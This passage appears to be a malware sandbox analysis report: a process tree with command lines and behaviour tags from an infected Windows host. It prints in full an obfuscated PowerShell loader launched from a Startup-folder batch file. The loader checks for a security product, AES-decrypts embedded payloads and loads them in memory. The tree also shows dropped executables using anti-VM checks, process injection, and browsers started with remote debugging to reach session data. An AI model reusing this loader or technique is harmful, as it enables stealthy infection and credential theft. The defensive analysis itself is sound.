- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"4⤵
- System Location Discovery: System Language Discovery
PID:4408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "5⤵
- System Location Discovery: System Language Discovery
PID:2656
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"C:\Users\Admin\AppData\Local\Temp\1076269001\DTQCxXZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"C:\Users\Admin\AppData\Local\Temp\1076858001\TaVOM7x.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5832 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6124
-
-
-
C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1078317001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"C:\Users\Admin\AppData\Local\Temp\1078482001\sHN20me.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2104
-
-
C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"C:\Users\Admin\AppData\Local\Temp\1081729001\spoDnGT.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3912
-
-
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3804 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1616 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91615cc40,0x7ff91615cc4c,0x7ff91615cc586⤵PID:1832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1932 /prefetch:26⤵PID:1280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1772,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:36⤵PID:3116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2196 /prefetch:86⤵PID:1164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3148 /prefetch:16⤵
- Uses browser remote debugging
PID:1604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:16⤵
- Uses browser remote debugging
PID:3040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4216,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4224 /prefetch:86⤵PID:5008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4440,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4384 /prefetch:16⤵
- Uses browser remote debugging
PID:5856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4208,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4740 /prefetch:86⤵PID:4348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4884 /prefetch:86⤵PID:1672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4892,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5032 /prefetch:86⤵PID:3792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5200,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5224 /prefetch:16⤵
- Uses browser remote debugging
PID:5192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5056,i,9545085409291658643,1446655278112688104,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4744 /prefetch:86⤵PID:1628
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2332 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc586⤵PID:5844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1968 /prefetch:26⤵PID:5808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1716,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2140 /prefetch:36⤵PID:3148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2056,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2216 /prefetch:86⤵PID:1884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3152 /prefetch:16⤵
- Uses browser remote debugging
PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3196 /prefetch:16⤵
- Uses browser remote debugging
PID:2640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4388 /prefetch:86⤵PID:5192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4444,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4620 /prefetch:16⤵
- Uses browser remote debugging
PID:3948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4400,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4784 /prefetch:86⤵PID:3504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4224,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4628 /prefetch:16⤵
- Uses browser remote debugging
PID:5960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4220,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4212 /prefetch:86⤵PID:2880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5156 /prefetch:86⤵PID:5972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5372,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5356 /prefetch:86⤵PID:832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5464,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5472 /prefetch:86⤵PID:5488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,243265129296253253,17098841687307661968,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4880 /prefetch:86⤵PID:5240
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3264 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd86⤵PID:1720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:26⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:36⤵PID:220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:86⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:16⤵
- Uses browser remote debugging
PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:16⤵
- Uses browser remote debugging
PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1988 /prefetch:26⤵PID:5464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2712 /prefetch:26⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2016 /prefetch:26⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2332 /prefetch:26⤵PID:2040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4612 /prefetch:26⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:16⤵
- Uses browser remote debugging
PID:5324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:16⤵
- Uses browser remote debugging
PID:5000
-
-
